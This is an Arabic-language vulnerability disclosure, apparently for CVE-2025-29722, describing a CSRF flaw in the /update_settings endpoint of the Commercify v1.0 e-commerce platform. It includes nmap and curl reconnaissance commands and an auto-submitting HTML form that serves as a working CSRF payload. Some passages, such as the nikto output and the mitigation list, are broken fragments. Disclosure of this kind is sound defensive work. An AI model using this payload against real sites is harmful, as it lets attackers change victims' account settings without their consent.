
تزوير الطلب عبر المواقع (CSRF) في Commercify v1.0
اكتشفه: David P.S Abraham (المعروف بـ Davycipher)
CVE-2025-29722 تم تعيينه لهذه الثغرة الأمنية بواسطة MITRE Corporation.
تم تحديد ثغرة CSRF في Commercify الإصدار 1.0، وهي منصة تجارة إلكترونية مفتوحة المصدر طورها @yassmittal. يفتقر التطبيق إلى آليات حماية مناسبة من CSRF على نقاط النهاية الحيوية مثل /update_settings، مما يسمح للمهاجمين بتكوين طلبات ضارة لتعديل بيانات المستخدم عند تنفيذها من نطاق آخر.
كشف فحص nmap أن الخدمة كانت متاحة عبر المنفذ 5173، مما يشير إلى وجود خادم تطوير محتمل.
nmap -p 5173 localhost
بعد ذلك، قمت بمسح التطبيق باستخدام nikto، وكشف ما يلي:
X-Frame-OptionsAccess-Control-Allow-Origin: *)أثناء استكشاف التطبيق، اشتبهت في وجود نقطة نهاية update_settings بناءً على ميزات لوحة تحكم المستخدم. اختبرتها باستخدام:
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"
على الرغم من إرجاع 404 Not Found، إلا أن هذا السلوك يعتمد على البيئة. في النشرات الصالحة، قد يؤدي ذلك إلى التلاعب الكامل بالحساب.
هجوم قائم على HTML لاستغلال ثغرة CSRF:
<form action="http://localhost:5173/update_settings" method="POST">
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
SameSite على الكوكيز*)SameSite=Strict أو Lax على الكوكيزDavid P.S. Abraham
الاسم المستعار: Davycipher